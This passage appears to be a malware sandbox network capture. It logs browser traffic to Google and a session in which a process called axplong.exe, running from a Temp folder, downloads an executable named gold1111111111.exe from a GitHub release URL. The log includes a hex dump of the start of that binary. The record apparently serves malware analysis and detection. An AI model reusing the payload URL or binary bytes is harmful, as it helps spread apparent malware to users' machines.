                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                  Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                  Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC1390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 35 30 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 2c 31 30 32 32 37 38 32 31 31 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63
                                                                                                                                                                                                                                                  Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700250,3700949,3701384,102278205,102278211],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(func
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC1390INData Raw: 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 47 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 46 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 48 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 49 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63
                                                                                                                                                                                                                                                  Data Ascii: 3e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Gd\u003dfunction(a){return new _.Fd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Hd\u003dglobalThis.trustedTypes;_.Id\u003dclass{c
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC1390INData Raw: 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 57 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 49 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 58 64 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 5a 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20
                                                                                                                                                                                                                                                  Data Ascii: _.Td)return a.i;throw Error(\"F\");};_.Xd\u003dfunction(a){if(Wd.test(a))return a};_.Yd\u003dfunction(a){if(a instanceof _.Id)if(a instanceof _.Id)a\u003da.i;else throw Error(\"F\");else a\u003d_.Xd(a);return a};_.Zd\u003dfunction(a,b\u003ddocument){let
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC1390INData Raw: 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 6b 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 79 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33
                                                                                                                                                                                                                                                  Data Ascii: nt,a?a\u003d(b||c).querySelector(a?\".\"+a:\"\"):(b\u003db||c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]||null));return a||null};\n_.ke\u003dfunction(a,b){_.yb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC101INData Raw: 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 6d 65 28 64 6f 63 75 6d 65 6e 74 2c 61 29 7d 3b 5f 2e 6d 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 62 5c 75 30 30 33 64 53 74 72 69 6e 67 28 62 29 3b 61 2e 63 6f 6e 74 65 6e 74 54 79 70 65 5c 75 30 30 33 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 03dfunction(a){return _.me(document,a)};_.me\u003dfunction(a,b){b\u003dString(b);a.contentType\u003


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449866185.199.108.1334432800C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC556OUTGET /github-production-release-asset-2e65be/910997785/34bbe59b-8804-485f-bec3-be8f21681382?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250103%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250103T085015Z&X-Amz-Expires=300&X-Amz-Signature=95284105c340b388ec84ffb84562274149d126ddb76b6dfe4032a6b569caa23b&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgold1111111111.exe&response-content-type=application%2Foctet-stream HTTP/1.1
                                                                                                                                                                                                                                                  Host: objects.githubusercontent.com
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC850INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Content-Length: 824832
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Last-Modified: Thu, 02 Jan 2025 02:28:28 GMT
                                                                                                                                                                                                                                                  ETag: "0x8DD2AD5243F1B95"
                                                                                                                                                                                                                                                  Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  x-ms-request-id: 90acf0a1-401e-002b-20be-5c6199000000
                                                                                                                                                                                                                                                  x-ms-version: 2024-11-04
                                                                                                                                                                                                                                                  x-ms-creation-time: Thu, 02 Jan 2025 02:28:28 GMT
                                                                                                                                                                                                                                                  x-ms-blob-content-md5: TzxsGbAHivuawebSzmEW5w==
                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                  x-ms-lease-state: available
                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=gold1111111111.exe
                                                                                                                                                                                                                                                  x-ms-server-encrypted: true
                                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                  Fastly-Restarts: 1
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Age: 0
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:16 GMT
                                                                                                                                                                                                                                                  X-Served-By: cache-iad-kiad7000092-IAD, cache-nyc-kteb1890031-NYC
                                                                                                                                                                                                                                                  X-Cache: HIT, MISS
                                                                                                                                                                                                                                                  X-Cache-Hits: 269, 0
                                                                                                                                                                                                                                                  X-Timer: S1735894217.779523,VS0,VE7
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 08 00 da aa 72 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 48 02 00 00 d6 00 00 00 00 00 00 a0 a2 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 0c 00 00 08 00 00 00 00 00 00 03 00 40 c2 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac e6 02 00 28 00 00
                                                                                                                                                                                                                                                  Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELrgH@@(
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 00 01 00 00 99 f7 f9 89 95 d8 fd ff ff 8b 85 c4 fd ff ff b9 02 00 00 00 99 f7 f9 83 fa 00 0f 85 37 00 00 00 c7 04 24 00 20 00 00 e8 7f 1a 01 00 89 85 ac fd ff ff 83 bd ac fd ff ff 00 0f 84 05 00 00 00 e9 05 00 00 00 e9 00 00 00 00 8b 85 ac fd ff ff 89 04 24 e8 ff 16 01 00 8b 85 d4 fd ff ff 8b 8d d8 fd ff ff 0f b6 8c 0d dc fe ff ff 01 c8 b9 00 01 00 00 99 f7 f9 89 95 d4 fd ff ff 8d 85 dc fe ff ff 03 85 d4 fd ff ff 8d 8d dc fe ff ff 03 8d d8 fd ff ff 89 0c 24 89 44 24 04 e8 a9 00 00 00 8b 85 d8 fd ff ff 0f b6 84 05 dc fe ff ff 8b 8d d4 fd ff ff 0f b6 8c 0d dc fe ff ff 01 c8 b9 00 01 00 00 99 f7 f9 89 95 a8 fd ff ff 8b 85 a8 fd ff ff 0f b6 b4 05 dc fe ff ff 8b 45 08 8b 8d c4 fd ff ff 0f b6 14 08 31 f2 88 14 08 8b 85 c4 fd ff ff 83 c0 01 89 85 c4 fd ff ff e9
                                                                                                                                                                                                                                                  Data Ascii: 7$ $$D$E1
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 75 8c 8b 6e 0c e9 00 00 00 00 e9 00 00 00 00 c7 46 70 00 00 00 00 e9 74 00 00 00 e8 ba 1c 00 00 66 89 c1 66 8b 46 18 0f b7 c9 89 0c 24 0f b7 c0 89 44 24 04 e8 91 1b 00 00 a8 01 0f 85 05 00 00 00 e9 0e 00 00 00 8b 46 60 83 c8 04 89 46 60 e9 12 00 00 00 8b 46 54 83 46 50 ff 83 d0 ff 89 46 54 e9 3f ff ff ff e9 00 00 00 00 8b 4d 08 8b 01 03 48 04 89 e0 c7 40 04 00 00 00 00 c7 00 00 00 00 00 e8 b3 1c 00 00 83 ec 08 e9 80 ff ff ff 8b 4d 08 8b 01 8b 40 04 01 c1 8b 56 60 c7 46 70 00 00 00 00 89 e0 89 10 c7 40 04 00 00 00 00 e8 d7 1c 00 00 83 ec 08 e9 00 00 00 00 8b 45 08 89 46 10 8d 4e 48 e8 11 1d 00 00 8b 46 10 8b 4e 68 64 89 0d 00 00 00 00 8d 65 f4 5e 5f 5b 5d c3 66 66 66 2e 0f 1f 84 00 00 00 00 00 55 83 ec 08 8d 75 8c 8b 6e 0c 8d 4e 3c e8 3e 1a 00 00 83 c4 08
                                                                                                                                                                                                                                                  Data Ascii: unFptffF$D$F`F`FTFPFT?MH@M@V`Fp@EFNHFNhde^_[]fff.UunN<>
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 0f b6 c0 89 45 d0 8b 4d f4 31 e9 e8 f9 53 00 00 8b 45 d0 83 c4 44 5e 5f 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 83 ec 50 8b 45 0c 8b 45 08 a1 c0 07 43 00 31 e8 89 45 f8 c7 45 f3 05 01 55 0f c7 45 f0 05 ff 25 05 c7 45 ec e9 a0 00 00 c7 45 e4 09 16 00 00 c7 45 dc 00 00 00 00 c7 45 d8 00 00 00 00 c7 45 d4 00 00 00 00 c7 45 d0 29 dd a9 07 89 e0 c7 40 0c 11 00 00 00 c7 40 08 00 00 43 00 c7 40 04 49 05 00 00 c7 00 11 00 43 00 e8 df f1 ff ff c7 45 e0 01 00 00 00 c7 45 cc 00 00 00 00 8b 45 d0 35 28 01 06 8d 89 45 cc 8d 45 ec 8b 4d 0c 8b 55 08 89 14 24 89 4c 24 04 89 44 24 08 c7 44 24 0c 0b 00 00 00 e8 a5 f1 ff ff 8b 0d 70 14 43 00 8d 05 4d ae 42 00 89 0c 24 89 44 24 04 ff 15 b4 e8 42 00 83 ec 08 89 45 c8 83 7d e4 00 0f 86 0b 00 00 00 8b 45 e4
                                                                                                                                                                                                                                                  Data Ascii: EM1SED^_]UVPEEC1EEUE%EEEEEE)@@C@ICEEE5(EEMU$L$D$D$pCMB$D$BE}E
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 45 08 89 4d fc 8b 45 0c c1 e0 02 8b 4d 08 89 0c 24 89 44 24 04 e8 0c 00 00 00 83 c4 0c 5d c2 08 00 cc cc cc cc cc 55 89 e5 83 ec 08 8b 45 0c 8b 45 08 81 7d 0c 00 10 00 00 0f 82 12 00 00 00 8d 4d 08 8d 45 0c 89 0c 24 89 44 24 04 e8 25 00 00 00 8b 45 0c 8b 4d 08 89 0c 24 89 44 24 04 e8 fb 4d 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 10 8b 45 0c 8b 45 08 8b 45 0c 8b 08 83 c1 23 89 08 8b 45 08 8b 00 89 45 fc 8b 45 fc 8b 40 fc 89 45 f8 c7 45 f4 04 00 00 00 8b 45 08 8b 00 2b 45 f8 89 45 f0 83 7d f0 04 0f 82 0f 00 00 00 83 7d f0 23 0f 87 05 00 00 00 e9 0a 00 00 00 e9 00 00 00 00 e8 13 f6 00 00 e9 00 00 00 00 8b 4d f8 8b 45 08 89 08 83 c4 10 5d c3 cc cc 55 89 e5 83 ec 1c 8b 45 08 89 4d f8 8b 45 f8 89 45 ec 89 45 f4 8b 45 f4 83
                                                                                                                                                                                                                                                  Data Ascii: EMEM$D$]UEE}ME$D$%EM$D$M]UEEE#EEE@EEE+EE}}#ME]UEMEEEE
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 89 45 fc 8b 45 fc 83 c4 18 5d c2 04 00 cc cc cc cc cc cc cc 55 89 e5 50 8b 45 0c 8b 45 08 8b 4d 08 8b 45 0c 8b 00 89 04 24 e8 36 02 00 00 5d c3 cc cc cc cc 55 89 e5 8b 45 10 8b 45 0c 8b 45 08 8b 45 0c 8b 4d 10 8b 09 89 08 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 8b 45 08 8b 45 08 5d c3 cc cc cc cc cc 55 89 e5 83 ec 28 8b 45 14 8b 45 10 8b 45 0c 8b 45 08 a1 c0 07 43 00 31 e8 89 45 fc 8d 45 08 89 04 24 e8 a9 06 00 00 89 45 f8 8d 45 0c 89 04 24 e8 9b 06 00 00 89 45 f4 8b 45 10 89 04 24 e8 ad ff ff ff 8b 4d f4 8b 55 f8 89 14 24 89 4c 24 04 89 44 24 08 e8 87 06 00 00 8b 45 10 8b 4d f4 8b 55 f8 29 d1 c1 f9 02 c1 e1 02 01 c8 89 45 e4 8b 4d fc 31 e9 e8 68 48 00 00 8b 45 e4 83 c4 28 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 28 8b 45 10 8b 45
                                                                                                                                                                                                                                                  Data Ascii: EE]UPEEME$6]UEEEEM]UEE]U(EEEEC1EE$EE$EE$MU$L$D$EMU)EM1hHE(]U(EE
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: cc cc 55 89 e5 83 ec 14 8b 45 08 89 4d f8 8b 4d f8 89 4d f0 89 4d fc 8b 45 08 89 45 f4 e8 80 ff ff ff 8b 45 f4 83 f8 00 0f 84 0b 00 00 00 8b 45 f0 89 04 24 e8 5c 43 00 00 8b 45 fc 83 c4 14 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 0c 89 4d fc 8b 45 fc 89 45 f8 83 78 04 00 0f 84 0e 00 00 00 8b 45 f8 8b 40 04 89 45 f4 e9 0e 00 00 00 8d 05 5c ae 42 00 89 45 f4 e9 00 00 00 00 8b 45 f4 83 c4 0c 5d c3 cc cc cc 55 89 e5 83 ec 14 8b 45 0c 8b 45 08 89 4d fc 8b 45 fc 89 45 f8 8d 0d 18 61 42 00 89 08 83 c0 04 31 c9 89 04 24 c7 44 24 04 00 00 00 00 c7 44 24 08 08 00 00 00 e8 d6 97 00 00 8b 45 f8 8b 4d 08 89 48 04 83 c4 14 5d c2 08 00 cc cc cc cc cc cc 55 89 e5 83 ec 14 8b 45 08 89 4d f8 8b 4d f8 89 4d f0 89 4d fc 8b 45 08 89 45 f4 e8 b0
                                                                                                                                                                                                                                                  Data Ascii: UEMMMMEEEE$\CE]UMEExE@E\BEE]UEEMEEaB1$D$D$EMH]UEMMMMEE
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: 55 83 ec 08 83 c5 0c 8d 4d e0 e8 b6 41 00 00 83 c4 08 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 0c 89 c8 8b 4d 08 89 ca 89 55 f8 89 45 fc 8b 45 fc 8b 40 30 89 04 24 e8 6f 19 00 00 83 ec 04 8b 45 f8 83 c4 0c 5d c2 04 00 cc cc 55 89 e5 83 ec 1c 89 4d fc 8b 45 fc 89 45 f8 83 78 04 00 0f 84 52 00 00 00 8b 45 f8 8b 40 04 89 45 ec 8b 00 8b 48 08 89 4d f0 ff 15 2c e6 42 00 8b 4d ec 8b 45 f0 ff d0 89 45 f4 83 f8 00 0f 84 22 00 00 00 8b 45 f4 8b 00 8b 08 89 4d e8 ff 15 2c e6 42 00 8b 4d f4 8b 45 e8 c7 04 24 01 00 00 00 ff d0 83 ec 04 e9 00 00 00 00 83 c4 1c 5d c3 55 89 e5 50 89 4d fc 8b 45 fc 8b 40 14 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 66 8b 45 0c 66 8b 45 08 0f b7 45 08 0f b7 4d 0c 39 c8 0f 94 c0 24 01 0f b6 c0 5d c3
                                                                                                                                                                                                                                                  Data Ascii: UMA]UMUEE@0$oE]UMEExRE@EHM,BMEE"EM,BME$]UPME@]UfEfEEM9$]
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC1378INData Raw: ff ff ff 8d 45 e8 c7 45 ec 40 6e 40 00 64 8b 15 00 00 00 00 89 55 e8 64 a3 00 00 00 00 89 4d e0 8b 45 e0 8b 08 8b 01 03 48 04 e8 6f fb ff ff 89 45 dc 83 7d dc 00 0f 84 2e 00 00 00 8b 45 dc 89 45 d4 8b 00 8b 48 08 89 4d d8 a1 2c e6 42 00 ff d0 8b 4d d4 8b 45 d8 c7 45 f0 00 00 00 00 ff d0 e9 00 00 00 00 e9 00 00 00 00 8b 45 e8 64 a3 00 00 00 00 83 c4 20 5e 5f 5b 5d c3 0f 1f 00 55 83 c5 0c e8 07 70 00 00 cc cc cc cc cc cc cc 55 89 e5 50 89 4d fc 8b 45 fc 8b 40 0c 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 83 ec 0c 89 4d fc 8b 45 fc 89 45 f4 8b 00 8b 48 34 89 4d f8 ff 15 2c e6 42 00 8b 4d f4 8b 45 f8 ff d0 83 c4 0c 5d c3 cc cc cc cc cc cc 55 89 e5 83 ec 18 a1 c0 07 43 00 31 e8 89 45 fc 89 4d f4 8b 45 f4 89 45 f0 83 38 00 0f 85 3c 00 00
                                                                                                                                                                                                                                                  Data Ascii: EE@n@dUdMEHoE}.EEHM,BMEEEd ^_[]UpUPME@]UMEEH4M,BME]UC1EMEE8<


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  9192.168.2.449862142.250.186.1644432024C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-01-03 08:50:16 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2025-01-03 08:50:17 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Version: 705503573
                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                  Date: Fri, 03 Jan 2025 08:50:16 GMT
                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
